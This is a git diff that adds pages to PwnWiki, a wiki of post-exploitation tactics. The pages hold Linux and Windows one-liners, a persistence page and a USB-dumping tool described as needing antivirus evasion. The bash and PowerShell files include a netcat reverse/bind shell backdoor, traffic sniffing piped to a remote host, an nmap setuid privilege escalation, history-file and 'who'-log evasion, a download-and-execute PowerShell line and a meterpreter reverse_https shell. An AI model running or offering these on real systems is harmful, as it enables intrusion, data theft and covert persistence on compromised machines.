diff --git a/bins/windows.md b/bins/windows.md new file mode 100644 index 0000000..964b81a --- /dev/null +++ b/bins/windows.md @@ -0,0 +1,7 @@ +# Useful Windows Binaries + +Useful Windows binary tools that can be used for post exploitation. + +| Tool | Description / Importance | Contributer | +| ----------- | ------------------------ | ----------- | +| usbdump.exe | Once executed, usbdump will run in the background and will dump the contents of all connected usb devices to a randomly numbered folder within the same directory as the usbdump.exe program. Useful for grabbing the contents of any usb devices later connected to a compromized machine. May have to modify it to bypass AV as its signature is in quite a few AV's. | Ian | diff --git a/index.md~ b/index.md~ new file mode 100644 index 0000000..4163770 --- /dev/null +++ b/index.md~ @@ -0,0 +1,40 @@ +![](images/logo.jpg) + +[Image Generated Here](http://www.addletters.com/pictures/restaurant-sign-generator/4772466.htm#.UplRZ42PuuY) + +### PwnWiki.io is a collection TTPs (tools, tactics, and procedures) for what to do after access has been gained. + +- - - - - - + +### Live Online Copy: + +You can find a copy of the project online at: http://pwnwiki.io + +### Offline Use: + + 1. Clone the repository or pull the archive ([download zip](https://github.com/pwnwiki/pwnwiki.github.io/archive/master.zip)) of the repo + 2. Open index.html + 3. Most modern browsers don't allow the access of local files from a locally loaded HTML file. On Windows you can use [Mongoose Tiny](http://cesanta.com/downloads.html) or [HFS](http://www.rejetto.com/hfs/) to host the files locally. On OSX and Linux `python -m SimpleHTTPServer` seems to work just fine. + +#### Referenced tools can be found here: https://github.com/mubix/post-exploitation (If they aren't built into the OS) + +- - - - - - +#### Submitting Content +We want/need your help! Please contribute to this project is via GitHub (https://github.com/pwnwiki/pwnwiki.github.io). That allows us to get your project-ready content incorporated into the wiki fast. + +We realize that not everyone can/wants to submit content via GitHub and that's cool. If your go-to content is not up here and you don't want to spend the time becoming a Git Jedi, just visit our [Google Form](https://docs.google.com/forms/d/1N7-jRjnUXoz-UwB2h0du2IrskFJW6hBGs4YsTwvEncE/viewform). Due to the large amount of submissions and content, there may be a delay between your posting and us getting your content into the project. Thanks for your submissions and your patience! + +- - - - - - +Curators: + + * [@mubix](https://twitter.com/mubix) + * [@WebBreacher](https://twitter.com/webbreacher) + * [@tekwizz123](https://twitter.com/tekwizz123) + * [@jakx_](https://twitter.com/jakx_) + * [@TheColonial](https://twitter.com/TheColonial) + * [@Wireghoul](https://twitter.com/Wireghoul) + + +If you would like to become a curator, please contact [mubix@hak5.org](mailto:mubix@hak5.org) + +[gimmick:ForkMeOnGitHub ({ color: 'red', position: 'right' })](http://www.github.com/pwnwiki/pwnwiki.github.io/) diff --git a/persistence/linux/general.md b/persistence/linux/general.md new file mode 100644 index 0000000..0257939 --- /dev/null +++ b/persistence/linux/general.md @@ -0,0 +1,21 @@ + + + +# Linux General Persistence Commands + +Commands to run to maintain persistence after you have exploited it and are usually executed from the context of the bash prompt. + +###Run command as a daemon +*Note this doesn't work with anything from apache. Runs like & but doesn't care if the parent process closes* +```bash +setsid *command* +``` + diff --git a/persistence/linux/general.md~ b/persistence/linux/general.md~ new file mode 100644 index 0000000..e24603f --- /dev/null +++ b/persistence/linux/general.md~ @@ -0,0 +1,21 @@ + + + +# Linux General Persistence Commands + +Commands to run to maintain persistence after you have exploited it and are usually executed from the context of the bash prompt. + +###Run command as a daemon +*Note this doesn't work with anything from apache* +```bash +setsid *command* +``` + diff --git a/persistence/linux/index.md b/persistence/linux/index.md new file mode 100644 index 0000000..613c833 --- /dev/null +++ b/persistence/linux/index.md @@ -0,0 +1,5 @@ +# Linux Persistence Commands + +Commands that help you maintain control over a compromised system. + + * [General Commands](general.md) - Commands your could/should use to maintain your hold on the compromised system. diff --git a/scripting/bash.md~ b/scripting/bash.md~ new file mode 100644 index 0000000..ad05c61 --- /dev/null +++ b/scripting/bash.md~ @@ -0,0 +1,113 @@ +# Bash Commands for Post Exploitation + +One liners +----------- + +**Resolve a list of hostnames to IP addresses** +```bash +awk < hostnames.txt '{ system("resolveip -s " $1) }' +``` + +**IIS 6.0 IP Disclosure** +```bash +curl -l -O -H "Host:" "example.com" +``` + +**Connect to SSL websites** +```bash +openssl s_client -connect example.com:443 +``` + +**Convert base64 to text** +```bash +echo 'base64string' | base64 -d (Use -D on OSX) +``` + +**Decode ASCII shellcode** +```bash +echo -e *shellcode hex string* (may need to use -i to ignore bad chars) +``` + +**Enumerate DNS of Class C** +```bash +for ip in $(seq 1 254); do; host 10.1.1.$ip | grep "name pointer"; done +``` + +**SSH to box and hide from "who" and "lastlog"** +```bash +ssh andrew@10.1.1.1 -T /bin/bash +``` + +**Prevent terminal logging** +```bash +unset HISTFILE +``` + +**Add immutable attribute to a unix file** +```bash +chattr +i *file* +``` + +**SSH into host2 through host1** +```bash +ssh -o "proxycommand ssh -W host2 host1" host2 +``` + +**Nmap setuid privesc** +```bash +nmap --script <(echo 'os.execute("/bin/sh")') +nmap --interactive (for older versions) +``` + +**Transfer files through SSH** +```bash +ssh test@10.1.1.1 "cat test.tar.gz" > test.tar.gz +``` + +**Internal port redirect for bypassing services** +```bash +iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 4444 +``` + +**Enable forwarding on the fly** +```bash +sysctl -w net.ipv4.ip_forward=1 +``` + +**Kill with USR1 developer defined signal** +```bash +kill -USR1 +``` + +**Pull IP addresses from a file** +```bash +grep -E -o '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' +``` + +**Sniff traffic with tcpdump and send to remote tcp socket** +```bash +tcpdump -w - | nc -v 8.8.8.8 9999 +``` + +**Recursively search for text contained in files within a directory** +```bash +zcat -rf ./* | grep "searchstring" +``` + +**Recursively search for files with the specified word within them** +*Submitted by cat on Google Fourms* +```bash +ls -a | find | grep -i "string" +``` + +**Netcat backdoor** +```bash +nc -e /bin/bash *remotecomputer* *port* +OR +nc -e /bin/bash -lp *port* +``` + +Credits +----------- +Credits to @TheAndrewBalls for posting some awsome one liners (the hidden SSH example and the DNS enumeration are both his contributions) + diff --git a/scripting/powershell.md~ b/scripting/powershell.md~ new file mode 100644 index 0000000..9461b51 --- /dev/null +++ b/scripting/powershell.md~ @@ -0,0 +1,121 @@ + + + +# Windows Powershell Commands and Scripts for Post Exploitation + +# One liners + +**Download and Execute Remote Powershell Script** + +``` +iex (New-Object Net.WebClient).DownloadString("http://host/file.txt") +``` + +**Download and Save File** + +``` +(new-object System.Net.WebClient).Downloadfile('http://host/file.exe', 'file.exe') +``` + +**Enumerate Allowed Outbound Ports 1-1024 via [securitypadawan.blogspot.com](http://securitypadawan.blogspot.com/2013/04/quickly-determine-allowed-outbound-ports.html)** + +``` +$ErrorActionPreference = "silentlycontinue"; 1..1024 | % {$req = [System.Net.WebRequest]::Create("http://letmeoutofyour.net:$_"); $req.Timeout = 600; $resp = $req.GetResponse(); $respstream = $resp.GetResponseStream(); +$stream = new-object System.IO.StreamReader $respstream; $out = $stream.ReadToEnd(); if ($out.trim() -eq "w00tw00t"){echo "$_ Allowed out"}} +``` + +**Reverse Shell Using [PowerSploit's Invoke-Shellcode](https://github.com/mattifestation/PowerSploit/blob/master/CodeExecution/Invoke-Shellcode.ps1)** + +``` +Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.1.10 -Lport 443 -Force +``` + +---- + +# Commands with Sample Output +## Hardware +### Get BIOS Information + * **Command with arguments**: `gwmi win32_bios` + * **Description**: Retrieves BIOS information including system serial number. + * **Output**: + *
**Windows 7:** Show/Hide
PS C:\Users\johndoe> gwmi win32_bios
SMBIOSBIOSVersion : 6.00
Manufacturer : Phoenix Technologies LTD
Name : PhoenixBIOS 4.0 Release 6.0
SerialNumber : VMware-56 4d 9b 0f 26 ba 8c f9-6e 7a 1e 33 5d 3c f0 dc
Version : INTEL - 6040000
+ +### Get Drive Information + * **Command with arguments**: `[System.IO.DriveInfo]::GetDrives()` + * **Output**: + *
**Windows 7:** Show/Hide
PS C:\Users\johndoe> [System.IO.DriveInfo]::GetDrives()

Name : C:\
DriveType : Fixed
DriveFormat : NTFS
IsReady : True
AvailableFreeSpace : 55568087552
TotalFreeSpace : 55568087552
TotalSize : 159876850304
RootDirectory : C:\
VolumeLabel :

Name : D:\
DriveType : CDRom
DriveFormat :
IsReady : False
AvailableFreeSpace :
TotalFreeSpace :
TotalSize :
RootDirectory : D:\
VolumeLabel :

Name : G:\
DriveType : Removable
DriveFormat :
IsReady : False
AvailableFreeSpace :
TotalFreeSpace :
TotalSize :
RootDirectory : G:\
VolumeLabel :

Name : V:\
DriveType : Network
DriveFormat : NTFS
IsReady : True
AvailableFreeSpace : 259182640616
TotalFreeSpace : 259182640616
TotalSize : 827361812256
RootDirectory : V:\
VolumeLabel : TestMappedDrive
+ +## User Information +### Display Username, SID, Last Used + * **Command with arguments**: `gwmi win32_userprofile | select -unique @{name="Name";expression={$_.__server}},@{name="SID";expression={$_.sid}},@{name="LastUseTime";expression={$_.converttodatetime($_.lastusetime)}},localpath | ft -auto` + * **Description**: Retrieves information about system users. + * **Output**: + *
**Windows 7:** Show/Hide
PS C:\Users\johndoe> gwmi win32\_userprofile | select -unique @{name="Name";expression={$\_.\_\_server}},@{name="SID";expressi
on={$\_.sid}},@{name="LastUseTime";expression={$\_.converttodatetime($\_.lastusetime)}},localpath | ft -auto

Name            SID                                            LastUseTime          localpath
----            ---                                            -----------          ---------
WIN-244VDGE5OGH S-1-5-21-1319606305-3131390644-2280705280-1000 4/13/2012 7:52:02 PM C:\Users\johndoe
WIN-244VDGE5OGH S-1-5-20                                                            C:\Windows\ServiceProfiles\Netwo...
WIN-244VDGE5OGH S-1-5-19                                                            C:\Windows\ServiceProfiles\Local...
WIN-244VDGE5OGH S-1-5-18                                                            C:\Windows\system32\config\syste...
+ +### Translate SID to Username + * **Command with arguments**: `((New-Object System.Security.Principal.SecurityIdentifier("S-1-5-19")).translate([System.Security.Principal.NTAccount])).value` + * **Output**: + *
**Windows 7:** Show/Hide
PS C:\Users\johndoe> ((New-Object System.Security.Principal.SecurityIdentifier("S-1-5-21-1319606305-3131390644-2280705280-
1000")).translate([System.Security.Principal.NTAccount])).value
WIN-244VDGE5OGH\johndoe
+ + ## Using the PowerShell Active Directory Modules + ### Via https://www.trustedsec.com/uncategorized/powershell-reconnaissance/ + ### Setting Credentials + * **Command with arguments**: `$cred = Get-Credential` + * **Description**: Stores valid credentials in the $cred variable for use with the Active Directory Modules. + * **Notes**: These following commands require the Powershell Active Directory Modules to be installed. Steps to install for Win7 are detailed [here] (http://blogs.msdn.com/b/rkramesh/archive/2012/01/17/how-to-add-active-directory-module-in-powershell-in-windows-7.aspx) + + ### Query to List "Domain Admins" + * **Command with arguments**: `Get-ADGroupMember -Credential $cred -server pwnt.com "Domain Admins"` + * **Output**: + *
**Windows 7:** Show/Hide
distinguishedName : CN=Administrator,CN=Users,DC=pwnt,DC=com
name : Administrator
objectClass : user
objectGUID : 1fd60ff8-07a4-4c6e-9a1e-7cd0d7bb97db
SamAccountName : Administrator
SID : S-1-5-21-2027135834-1792351174-2509185371-500
+ + ### Enumerate All Servers on Domain + * **Command with arguments**: `Get-ADComputer -Credential $cred -server pwnt.com -LDAPFilter "(&(objectCategory=computer)(opera +tingSystem=*Server*))" |select name` + * **Output**: + *
**Windows 7:** Show/Hide
name
----
PWNT-DC
+Exchange1
+SharePoint1
+ + ### Get Info About All Connected Drives + * **Command with arguments**: `[System.IO.DriveInfo]::GetDrives()` + * **Output**: + *
**Windows 7:** Show/Hide
+ Name : C:\ + DriveType : Fixed + DriveFormat : NTFS + IsReady : True + AvailableFreeSpace : 111111111111 + TotalFreeSpace : 111111111111 + TotalSize : 111111111111 + RootDirectory : C:\ + VolumeLabel : HP +
+ Name : D:\ + DriveType : Fixed + DriveFormat : NTFS + IsReady : True + AvailableFreeSpace : 111111111111 + TotalFreeSpace : 111111111111 + TotalSize : 111111111111 + RootDirectory : D:\ + VolumeLabel : DATA +
+ Name : E:\ + DriveType : CDRom + DriveFormat : + IsReady : False + AvailableFreeSpace : + TotalFreeSpace : + TotalSize : + RootDirectory : E:\ + VolumeLabel : +